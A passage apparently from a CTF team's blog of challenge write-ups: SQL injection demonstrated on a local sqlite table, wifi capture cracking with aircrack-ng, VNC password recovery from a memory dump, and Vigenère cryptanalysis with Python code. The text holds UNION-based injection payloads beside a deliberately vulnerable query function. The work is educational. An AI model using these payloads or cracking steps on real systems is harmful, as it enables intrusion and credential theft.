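    db.executemany("INSERT INTO shortner VALUES (?, ?, ?)", ROWS)
    return db


def resolve_vulnerable(db, alias):
    """The alias is pasted into the statement: whatever follows the quote is SQL."""
    sql = "SELECT url FROM shortner WHERE alias = '%s'" % alias
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def resolve_safe(db, alias):
    """Bound parameter: the alias is only ever compared, never parsed."""
    row = db.execute("SELECT url FROM shortner WHERE alias = ?", (alias,)).fetchone()
    return row[0] if row else None


# The injected aliases, in the order the write-up used them (sqlite spellings).
PROBE_VERSION = "' UNION SELECT sqlite_version()-- a"
PROBE_SCHEMA = "' UNION SELECT name || ' ' || sql FROM sqlite_master LIMIT 0,1-- a"
PROBE_RANGE = "' UNION SELECT min(id) || ' ' || max(id) || ' ' || count(*) FROM shortner-- a"
PROBE_FLAG = "' UNION SELECT url || ' ' || alias FROM shortner WHERE id = 40-- a"


def run_probes(db):
    """What each probe returns through the vulnerable lookup."""
    probes = [("version", PROBE_VERSION), ("schema", PROBE_SCHEMA),
              ("range", PROBE_RANGE), ("flag", PROBE_FLAG)]
    return {name: resolve_vulnerable(db, probe) for name, probe in probes}


if __name__ == "__main__":
    db = make_db()
    for name, result in run_probes(db).items():
        print("%-8s %s" % (name, result))
    print("safe     %r" % resolve_safe(db, PROBE_FLAG))   # None: the probe is just an unknown alias
```

The first SELECT matches no row (the alias is empty), so the UNION's single row is whatever the attacker selected, and the service prints it where the URL would go; with the bound parameter the same input is merely an alias nobody registered.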

NDH2k12 Prequals - What is it about this file ? - Mole Information

[image: challenge e-mail "Mole Information"]

In the sp113.pdf found in the bitmap “Wallpaper image”, we can see “author: SciteekSmith”.

Google is our friend : http://lmgtfy.com/?q=SciteekSmith

There is 1 result : http://www.facebook.com/SciteekSmith

[image: the facebook.com/SciteekSmith profile page]

NDH2k12 Prequals - Time is running out - captured file

[image: challenge e-mail "captured file"]

There is one file: sciteekadm.cap
It's an 802.11 capture.

Let's crack it with aircrack-ng and a wordlist.

[screenshot: aircrack-ng recovering the key]

Then we decrypted the capture with Cain.

[screenshot: Cain decrypting the capture]

We opened the decrypted capture in Wireshark.

[screenshot: Wireshark showing the PNG transfer]

We can see a PNG file.

We extracted it and got the flag.

[image: the extracted PNG containing the flag]

Wednesday, April 6 2011 01:17

NDH2k11 Prequals - Debriefing!

Last weekend, the prequalifications for the Nuit Du Hack 2011 CTF took place over 48h!

The rules were clear:

 * The first 10 teams qualify automatically for the CTF and win their free entries
 * They will be completed by 5 more teams (chosen by hzv? or from a waiting list, most likely)
 * There will be 12 challenges spread across the Web, Crypto, Forensics and Reverse categories
 * The prequals are open from Saturday the 2nd at 00:00 to Sunday the 3rd at 23:59

So we took part under the team name "404NameNotF0und", made up for the occasion of: awe, Ufox, mirmo, BAAL, ymvunjq, MaZ, ThunderLord and NiklosKoda! It was the first CTF of this kind for many of us, and it was a very rewarding experience for everyone!

We published the write-ups for the challenges in the following posts:

A very good result overall, since we validated every challenge, and they were all quite interesting and fun, even pretty tough for some of them :p. In the end we finish 7th in the ranking (the teams ahead of us got more bonus points for validating challenges first, even though a few of them completed all the challenges after we did).

[image: NDH2k11 prequals ranking]

Many thanks to HZV, and see you on June 18th for the CTF ;)

UPDATE 1: an official report, on the HZV website.

UPDATE 2: We just received an e-mail from HZV:

As a result of your participation to NDH2k11 CTF prequals that took place last weekend,
we are proud to announce that your team ended up in position #7.
Please find your 5 free entrances to Nuit Du Hack that will take place on June 18th 2011

\o/

Tuesday, April 5 2011 21:33

NDH2k11 Prequals - Forensic100

Material: RAW image

Goal: "The RAM of a machine running a VNC server was dumped. The goal is to recover this server's password."

After some research, we learn that the VNC password is stored in encrypted form in the registry, here: "HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC\Password"

A program that decrypts an encrypted VNC password is quickly found online: VNCpwdump. (That "encryption" is DES with a fixed, publicly known key, which is why the stored value can be decrypted offline without any further secret.)

So the goal is to find the corresponding registry key in the memory dump and decrypt it.

We try to open the .raw file in volatility:

D:\Challenges\NDH\Volatility-1.3_Beta>python volatility ident -f dump.raw
             Image Name: dump.raw
             Image Type: Service Pack 2
                VM Type: pae
                    DTB: 0xae2000
               Datetime: Thu Mar 10 14:28:56 2011

The file is correctly identified, and browsing the documentation we notice that volatility 1.4 can open a registry key directly. After installing it, all that's left is to run the right command:

C:\Users\K-Lu\Desktop\Volatility-1.4_rc1>python vol.py printkey -f dump.raw -K RealVNC\WinVNC4

Volatile Systems Volatility Framework 1.4_rc1
Legend: (S) = Stable   (V) = Volatile
----------------------------
Registry: \Device\HarddiskVolume1\WINDOWS\system32\config\software

Key name: WinVNC4 (S)
Last updated: 2011-03-10 13:10:51
Subkeys:
Values:
REG_BINARY    Password        : (S)
0000   DA 6E 31 84 95 77 AD 6B                            .n1..w.k
REG_SZ        SecurityTypes   : (S) VncAuth
REG_SZ        ReverseSecurityTypes : (S) None
REG_DWORD     QueryConnect    : (S) 0
REG_DWORD     QueryOnlyIfLoggedOn : (S) 0

So we find the encrypted VNC password: DA 6E 31 84 95 77 AD 6B; all that is left is to decode it with VNCpwdump:

D:\Hacking\Tools\VNCpwdump>vncpwdump.exe -k DA6E31849577AD6B

VNCPwdump v.1.0.6 by patrik@cqure.net
-------------------------------------
Password: secretpq

And there we go, all that was left was to submit the flag.

NDH2k11 Prequals - Crypto100

The first crypto challenge was without doubt the easiest of these prequals. It came as a text file named lorem.txt

Lorem clearly refers to Lorem Ipsum, the very well-known filler text of mock-up websites.

Here is the ciphertext:

NFPTF WAWMG SSCQY AMG CDCI, WIT TWFAIEVLAUHG GYGMICMWHI GFPZMUHCK KPLGL ZWHTRRVPA RRE, LPCT GPH JBDRTWZ ZMFWJ GPVIWMK. OAXIKJQIF PVA CXEFI KUEMVP PXWHO, ESCV JTZSGJW MQSCTGCKC SNW DYKWXTZV AZMFVZOJX, BPUMY BYJ GB MXVCD, KPZBL JSWXPZUPA PNELQ SBOX. WMMEIEFPAWR UTCAXFTWIOT PVEACW NTTS JM. ALWKU RSEXHTPVU VQI LOAMWH TVRV BB, XVPTGSNBE PGLTQ RNPYYNO, ZB PM DSEKYAPLU HZGH CK CABH, XEYHP HFPLK ERPVYC OSYIFUIMJ GA CVAC, DMCMSD IM MTH. CGJBYF ORSGBG DGWFTVZUXCI FKK NTWS DIV YI, WLUWMRQKJQT NH QIJGTRKWT AGRNVPXLEFI, WN SMTVBUWG XFJJMDLX VCVRZUZQQ NPKC CNBN QGFAMJ, GYIX FGD GS KWDYK GPYIKZ. XVBKE NGHWY, SVCD RVE WPEEGKPP GCY, TJYIMLO WWVGC DCING ASJNP EIEB QH QQCMG, VCCTGLXW CGV, NVVPXGAEO L. ZWBXGLNH DSYWKNPM HPPDOH QFNSQW NGECPG O AIJ, NDVKQY KSAFZKTGHFQ FIC, MDRLZHVGK YCMS PWL UAMHWLB TEQZBTGH, TRLYGHLO ACVCKJ HJLHZ MHMJQ DCNVE RW CGQXFZ. WAN KMKCL, I HVCD DTNUTEL ZTPZU UQFU HRAXEWDMK PJPGWAIXR, ULQRBDTX NYCIECAQW HNCYBVCCTWL KMKCL, MKRV ECFNS GIKNXFLNBU PNELQ TKOE QGHIIJ. ULL HNRZZJL EFMK MTH FFPW.

MAVVETK QZRMVXE UQUMG RPZK JM ALYJCH, SIEP UEHTZQ CBPS PSWJW UKHU IH, CK YBXH XM, DYRXLU HUIG GEGB OWEEW JTHV UBAGVRZR. QEOYHAN BECGZCEQC, GCAESYXWMFYV KU WVACIC BNG NVSM VVRXPLE, FKK CVXH QIDCH AZUP. CPGTZAXXG TR KYS ELIBM HVIEGHLWX, QSFTWLCKI WNIZRIBG DML, YVIJVHA WBFRJTL QZRYOT GFOTWHB KERTZSC. UMCH ZZVHM HVEKSB HRTS WN TX, RF HLMCKJAXGU ASKOTVV, UVLEYGJ ZATBOMLCXW NKZQ ITGK LJEZL SJWX. JLUJM QBTSG FNWD QGFAMJ C UCRP, CVLTTB TR DCVYCC XCMF, OFJABG EIDFJW AWZBS RIVR GNHCYE, OI HZIUQWFKD RXGQTHMHI HLKZ DIAGEYIBG. DEHCTR JCWQIA NZRDKO DYKJTRUKZAI CTVRXNA, DIV JTRRVPJYF, OFJTLHTI MFIVZELA ZHNGSITHP RGH JX VTVA XROGSH. NZEVAWXIJ OP MX NOVR. BB JZPMNEEK CKQTVUTGCZ SCEL WDRUKTMRGWD LDG JPP. NCIEV KHKYYKJ, LDG EFMK CC HZIUQWFKD OJTA TR. NYHXZDBTYZ UVB UTINMTOH JRWJQFHU MGKTAFW, KOHGZRPB TEGKGJF, BFPDU HEGKLV MQ SLGHJIP, JWLBIEVBU QV VVKEHF XEKMP QVVBA. YG FRNXUID SJHPVV PBVG IKKYT BDDYE YAMK, DPJIAFLK XW FTWMM BELTPA MA. FZYB ICCXLCISI GYWW FEVJTKWDUMY KIC XPDEZWJ, GS BB NSFMTGKGACIE CVLTTB OMUNJQ RPAM.

IG ORSGBG TR MN XR, MGS ZMFWJ KTMID, IYYI ICGPNIAF HSPF DPPDYCXVUXCI, RTRR KBHLI SGTX EWSTE NOVR LBGT. PWWIYJ TPAYF UVB IKWDXAKJI ECAWUHG, LR EKOPWWHIMLO KQKAKJQXF QZQEISS KCJQXV, GXCHMOD PSWJW JWZXIAFZQHX WYXWATV MQSCXCCK FTGRCIJCI WFNSQGVVLBXG. OFKMY TVFU SMS YGF NATQPVSN LMJK, UCPYC ESAEOX RMFAE WGYUIAVLK KNZAYLUII, EQU VYYNRK. EHGFIJY SEGKICW ZCJQP GIWPSG, XR GJHAIYNLQ TN IE YL MDPCKJQXHFZL, HTUTXLCH ET ULU IHKJKDW ALIUYCEJ GUQQ WWJRD, TQ TH NIAYKRHB MA UVB HXBPGLOH. WRGWM QNWIGH FOFVAM, IICNBA WRF DYVGO WEUOH, RLPJ QR GCTGIB, GLKANIMJ JLVHEGIGI OWEEW HXFY RVZXGKKMG TQ WEUCCMR. WSBVVEVQ RHBOMEYCXLO, SMGGWJ LJGQ DEYCIXZU YPSAELQ. TM BPUMY UETKSQWVU R LXLZ NSFMTULCA BMAEZBJGH, EIDFJW MGZBMOWCSB MSWPMM TPVKMMRQ, PLJAT GTX NYA ICGTMRGWD ZXUSYHMG, AETWZ MYVUDMS XZPQWHIYD C, UWRHODW JEHCMUYH EDGA XLNTVRGT. JPRWHPXZU SWVRO, LR PGHP, RGH YYJVV QR IGC NDKHL EMAJI, UQUMG FWJAXIWE PGVDVKKZ MY ZCLPXL, HCMKNXULG HTMDWVR BTUYE UOGESKACV FKK.

JDKSX TWFAIEVLAUHG VJXM QFVSVXXLT, PVXRIVP PNUFI AH UETKSQWVU VPPM COMG GPYIKZ, AYFRVLSBGDI WATX ZPAMKRT JCFNW AIFUIMSWZ IH. ZK TPPL TCMFAXPCC SIGVPZY, RHAXSVI AMXWSI ZRNZR TEWE EEYI. RZUS VIP, CK TTE OWMIOPQ CKNCPN, UVB KXZ DIE GPYIKZ DIY WCJPFQZVHYG HFNVZ, HVCD LJEZL, IL MTQ MGZBMOWCSB LWE. ZWFXX EGJ, TIPVLQ JM, RZRWW XR DCLKIACJ PXLID XWGESI, EVUQBFF LTV SEMSG EYCXPVEE, DCYCWWE YL XXW. AWZBS EKJSH VCYWWKJEK PPJL FGU BJBG, XEYHXW CGJBYF FZAINA AVSYHIEV YQWHU JSHISYHAMHI WCJQPVUZ, YRVIXWSH ELRULTPHU LR P WOAMTOH HLKZ, VEZ CDCI THBYW, UR RFP HB EP FLGH EONYK HTG. GJHAIYNLQ GBGFW VYAITVBA RVDY, TXOOXYK HTG, RNPYYNO HSPF GPH HBPVVVYI. MA HVSVBOE MFNTVUWT IX RV, VR XG JPP VCVRZUZQQ, NOVR KTFTYK HXFY YPAM YWTRJL JFPHOIEKG. TIWFC GMGMO GEJCJW FFPW ZRN. UGVGWDWAG TKVUAIW NWTRDK JPVG, XDRVE WTEPGIYI IFZMF, LXHZEBTYF JVLSKSCML PJPGWAIXR YZQX TAPX, EUIXZU LOIFVRQ, IHFESJ NJVGKZ CX EWKPJF BPG.

Start with a frequency analysis and a computation of the index of coincidence, keeping in mind that a Lorem Ipsum text has an IC above 0.07. Here we get 0.040046315846048, barely above the 1/26 ≈ 0.038 expected from uniformly random letters: the monoalphabetic structure is gone, so we are dealing with a polyalphabetic cipher, the best known being the Vigenère square. The fastest way to get the answer is to use the software Cryptool 1.4.21.

In two clicks we obtain the following key: CRYPTOLESUPERCHIEN

And the following decrypted text:

LOREM IPSUM DOLOR SIT AMET, DUI PELLENTESQUE PARTURIENT CONSEQUAT MASSA VENENATIS NEC, URNA SED RHONCUS RISUS IACULIS. ULTRICIES NEC NEQUE SAPIEN IPSUM, NUNC VIVAMUS VOLUPTATE DUI SUSCIPIT TRISTIQUE, NEQUE MUS EU ETIAM, MAGNA FACILISIS LACUS DIAM. SUSPENDISSE SCELERISQUE LECTUS ARCU UT. MASSA CONVALLIS EST SAPIEN ERAT UT, TINCIDUNT LOREM ALIQUAM, ID AT PHASELLUS ARCU AT ELIT, MAGNA DONEC AENEAN VENENATIS ET URNA, MONTES EU SED. LECTUS MAURIS SCELERISQUE SIT PEDE SED ET, SUSPENDISSE UT FERMENTUM SCELERISQUE, ET DICTUMST VOLUTPAT DIGNISSIM ANTE NUNC MOLLIS, ERAT SEM ID RISUS MAURIS. PROIN PROIN, ODIO NEC PHARETRA NON, PRETIUM PORTA METUS PORTA ARCU ID DOLOR, CORPORIS LEO, FRINGILLA A. VEHICULA VOLUTPAT TELLUS MOLLIS AENEAN A PER, TORTOR CONDIMENTUM NON, IMPERDIET ANTE EST ALIQUET PROIDENT, INTERDUM TURPIS JUSTO IPSUM MAGNA EU LIBERO. SIT VITAE, A DIAM FEUGIAT FELIS NIBH FACILISIS VULPUTATE, SUSCIPIT VENENATIS ULLAMCORPER VITAE, EGET NEQUE VESTIBULUM LACUS ERAT MONTES. SED DAPIBUS QUIS SED ODIO.

INTEGER CONUBIA DONEC ENIM UT MAURIS, ORCI MAURIS NIBH LACUS DIAM EU, AT AMET MI, LECTUS AMET ENIM VITAE PEDE SUSCIPIT. BLANDIT MALESUADA, PELLENTESQUE IN ORNARE MUS CRAS GRAVIDA, SIT EGET FELIS WISI. ULTRICIES IN SED AUGUE DIGNISSIM, MALESUADA SAGITTIS SIT, EGESTAS SODALES CONGUE COMMODO INTEGER. QUIS VITAE DICTUM ODIO ET ET, AD ADIPISCING POSUERE, SODALES BLANDITIIS WISI EGET NULLA ORCI. FUSCE MORBI QUIS MOLLIS A NUNC, AENEAN IN LIGULA QUIS, MOLLIS TELLUS JUSTO EGET RUTRUM, UT DIGNISSIM TINCIDUNT DUIS VENENATIS. SAPIEN SAPIEN LITORA SUSPENDISSE PRETIUM, SED PENATIBUS, MOLESTIE ULTRICES VULPUTATE NON UT EROS TEMPUS. ULTRICIES MI ET AMET. MI VOLUTPAT ADIPISCING ERAT CONDIMENTUM NON VEL. VITAE IACULIS, NON QUIS IN DIGNISSIM QUAM IN. VESTIBULUM SED FAUCIBUS FAUCIBUS VIVAMUS, SUSCIPIT PRETIUM, NULLA SAPIEN ID QUISQUE, FERMENTUM MI TEMPOR MASSA METUS. UT DAPIBUS ORNARE NUNC VITAE IPSUM ELIT, BIBENDUM ID RISUS MAURIS IN. DIAM PORTTITOR EROS SCELERISQUE VEL VIVAMUS, ID IN CONSECTETUER AENEAN DICTUM ANTE.

ET MAURIS IN UT IN, VEL RISUS METUS, EGET ELEIFEND QUAM PELLENTESQUE, ERAT VITAE AMET NULLA AMET WISI. LECTUS RISUS SED TRISTIQUE NATOQUE, UT PRAESENTIUM DIGNISSIM COMMODO TACITI, EGESTAS LACUS SUSPENDISSE INTEGER VOLUTPAT HENDRERIT SOLLICITUDIN. AUGUE EROS LEO LEO PLACERAT WISI, NULLA NULLAM NULLA FERMENTUM VULPUTATE, NON NULLAM. POSUERE DAPIBUS MASSA NULLAM, IN PHASELLUS EU UT UT SOLLICITUDIN, SAGITTIS AC SEM EUISMOD MAECENAS ENIM JUSTO, AC ID VOLUTPAT IN SED SENECTUS. SAEPE MAURIS MAURIS, TELLUS SED MAGNA LACUS, NUNC IN TACITI, SAGITTIS HENDRERIT VITAE NIBH PORTTITOR AC LACINIA. ULTRICES CONDIMENTUM, LECTUS NUNC SAGITTIS RHONCUS. ET NEQUE FACILISIS A NISL CONSEQUAT TINCIDUNT, TELLUS VESTIBULUM TELLUS ELEIFEND, NULLA SIT VEL ELEMENTUM BIBENDUM, LACUS EUISMOD ELEMENTUM A, NONUMMY ULTRICES AMET PHARETRA. VENENATIS LOREM, UT ANTE, NON JUSTO IN VEL PORTA AUGUE, DONEC SUSCIPIT LOBORTIS EU MAURIS, TRISTIQUE ALIQUET MAGNA CURABITUR SIT.

LOREM PELLENTESQUE ELIT CURABITUR, INTEGER AUGUE IN FACILISIS ERAT ODIO MAURIS, SUSPENDISSE EGET INTEGER SEQUI PENATIBUS AD. MI CRAS FRINGILLA LACINIA, COMMODO LIGULA VELIT ELIT AMET. NISL NEC, AT VEL ALIQUAM LIGULA, SED VEL SEM MAURIS VEL ULLAMCORPER DOLOR, DIAM NULLA, ET SEM VESTIBULUM SIT. VELIT NEC, LECTUS UT, DONEC IN MAECENAS RISUS TEMPOR, COMMODO NEC ETIAM PULVINAR, BLANDIT UT DIS. JUSTO RISUS CONSEQUAT NIBH SED DUIS, MAGNIS LECTUS DICTUM PRAESENT RISUS SUSPENDISSE FACILISI, ACCUMSAN PHASELLUS UT A DAPIBUS DUIS, NAM AMET ATQUE, AC NON AT AC DUIS LACUS NEC. PHASELLUS RISUS DELECTUS NIBH, VIVAMUS NEC, ALIQUAM QUAM SED PHARETRA. IN FEUGIAT INTERDUM AT ET, ET IN VEL DIGNISSIM, AMET VARIUS NIBH WISI LUCTUS VULPUTATE. MASSA PORTA VARIUS ODIO VEL. DIGNISSIM EGESTAS AUCTOR VERO, DONEC PLACERAT PROIN, RIDICULUS HENDRERIT VULPUTATE WISI AMET, MATTIS EGESTAS, TORTOR TURPIS UT RUTRUM NEC.

How to do it without tools?

By using the probable-word method of Commandant Bazeries: http://www.apprendre-en-ligne.net/crypto/vigenere/motprobvig.html

Betting on the high probability that the text begins with "loremipsum", subtracting that crib from the first ten ciphertext letters gave CRYPTOLESU.

Since nothing repeats within those ten letters, the key had to be longer than 10.

The most classic continuation being "Lorem ipsum dolor sit amet consectetur adipiscing elit", extending the crib with it gave: CRYPTOLESUPERCHIENCRYPUUGBSDHELBUARZRYGEEVWILZP

The 19th to 22nd letters, CRYP, repeat the start of the key, which fixes the period at 18; everything after that is noise because the real text continues with "DUI PELLENTESQUE" rather than "consectetur". So this method also leads straight to the key!
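As an added example (not part of the w3pwnz write-up, and not Cryptool's code), here is the whole process in Python: index of coincidence, the probable-word subtraction, period detection from the recurring key fragment, and decryption with the recovered key. The first ciphertext paragraph is not reproduced in this section, so the sample is the first sentence of the paragraph that starts "MAVVETK QZRMVXE", paired with the sentence "INTEGER CONUBIA ..." of the decrypted text. Because that paragraph is cut from the middle of the message, its first letter is enciphered with key index 16 (the E of ...CHI-E-N); that offset is derived here from the pair and confirmed by the decryption. The crib is therefore the known opening of that paragraph rather than "loremipsum"; the mechanics are the same.

```python
"""Vigenere toolkit for the NDH2k12 challenge: index of coincidence,
decryption with a known key, and Bazeries' probable-word method.
Added example, not the original write-up's code."""
import string

ALPHABET = string.ascii_uppercase

# Sample taken from the page: the first sentence of the ciphertext paragraph
# beginning "MAVVETK QZRMVXE" and the sentence of the decrypted text it maps
# to. That paragraph is not the start of the message, so its first letter is
# enciphered with key index 16 (derived from this pair, not stated on the page).
CIPHERTEXT = ("MAVVETK QZRMVXE UQUMG RPZK JM ALYJCH, SIEP UEHTZQ CBPS PSWJW "
              "UKHU IH, CK YBXH XM, DYRXLU HUIG GEGB OWEEW JTHV UBAGVRZR.")
PLAINTEXT = ("INTEGER CONUBIA DONEC ENIM UT MAURIS, ORCI MAURIS NIBH LACUS "
             "DIAM EU, AT AMET MI, LECTUS AMET ENIM VITAE PEDE SUSCIPIT.")
KEY = "CRYPTOLESUPERCHIEN"
PARAGRAPH_KEY_OFFSET = 16


def letters_only(text):
    """Keep A-Z only: the cipher never touches spaces or punctuation."""
    return "".join(c for c in text.upper() if c in ALPHABET)


def index_of_coincidence(text):
    """Probability that two letters drawn without replacement are equal.
    About 0.038 for uniformly random text, roughly 0.065-0.08 for Latin or
    English; a value near 0.04 on a long text points to a polyalphabetic
    cipher whose period is long relative to the text."""
    s = letters_only(text)
    n = len(s)
    if n < 2:
        return 0.0
    return sum(s.count(c) * (s.count(c) - 1) for c in ALPHABET) / (n * (n - 1))


def vigenere_decrypt(ciphertext, key, offset=0):
    """Classic Vigenere, P = C - K (mod 26). Non-letters are copied through
    and do not consume a key letter. `offset` is the key index used for the
    first letter, needed when decrypting a paragraph cut from mid-message."""
    key = letters_only(key)
    out, i = [], offset
    for c in ciphertext.upper():
        if c in ALPHABET:
            k = ALPHABET.index(key[i % len(key)])
            out.append(ALPHABET[(ALPHABET.index(c) - k) % 26])
            i += 1
        else:
            out.append(c)
    return "".join(out)


def keystream_from_crib(ciphertext, crib, position=0):
    """Bazeries' probable-word method: assume `crib` is the plaintext at
    letter index `position`; the key letters there are then C - P (mod 26).
    Where the guess is right the result is (a rotation of) the key; where
    it is wrong the result turns into noise."""
    c = letters_only(ciphertext)
    p = letters_only(crib)
    if position + len(p) > len(c):
        raise ValueError("crib runs past the end of the ciphertext")
    return "".join(
        ALPHABET[(ALPHABET.index(x) - ALPHABET.index(y)) % 26]
        for x, y in zip(c[position:position + len(p)], p)
    )


def candidate_period(keystream, min_match=4):
    """Smallest shift p at which the first `min_match` letters of the
    recovered keystream recur. A chance recurrence of 4 letters has
    probability 26**-4 per offset, so this is strong evidence for the key
    length even when the tail of the crib was wrong. Returns None when the
    crib was too short to cover a full period."""
    head = keystream[:min_match]
    for p in range(1, len(keystream) - min_match + 1):
        if keystream[p:p + min_match] == head:
            return p
    return None


def is_rotation(a, b):
    """True if b is a cyclic rotation of a (same key, different start)."""
    return len(a) == len(b) and b in a + a


def solve():
    """Run the whole pipeline on the sample and return the findings."""
    crib = "INTEGER CONUBIA DONEC ENIM UT MAURIS"  # known start of this paragraph
    ks = keystream_from_crib(CIPHERTEXT, crib)
    period = candidate_period(ks)
    return {
        "ic_cipher": index_of_coincidence(CIPHERTEXT),
        "ic_plain": index_of_coincidence(PLAINTEXT),
        "keystream": ks,
        "period": period,
        "key_fragment": ks[:period] if period else None,
        "plaintext": vigenere_decrypt(CIPHERTEXT, KEY, PARAGRAPH_KEY_OFFSET),
    }


if __name__ == "__main__":
    for name, value in solve().items():
        print(f"{name}: {value}")
```

The crib subtraction yields ENCRYPTOLESUPERCHIENCRYPTOLESUP, which is the key read from index 16 onward, and candidate_period finds 18 from the recurrence of ENCR. Run on the write-up's own keystream CRYPTOLESUPERCHIENCRYPUUGBSDHELBUARZRYGEEVWILZP it also returns 18 despite the noisy tail, which is exactly why a crib only needs to be correct for a few letters past one full period.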
